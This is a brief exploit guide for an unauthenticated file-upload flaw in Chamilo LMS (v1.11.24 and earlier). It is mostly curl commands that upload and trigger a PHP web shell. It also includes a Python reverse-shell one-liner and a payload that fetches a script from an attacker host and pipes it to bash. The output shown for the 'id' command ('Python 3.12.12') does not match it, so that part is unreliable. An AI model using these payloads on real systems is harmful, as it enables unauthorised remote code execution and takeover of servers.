intro

Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.

how to exploit

  • create a local file with payloads
echo '<?php system("id"); ?>' > test.php
  • upload the file
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
  • trigger the code
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'
Python 3.12.12

combined with reverse shell

  • create a rev.sh file
# rev.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • create a file to upload
> echo '<?php system("curl http://attacker/rev.sh|bash"); ?>' > test.php
  • upload
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  • trigger
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'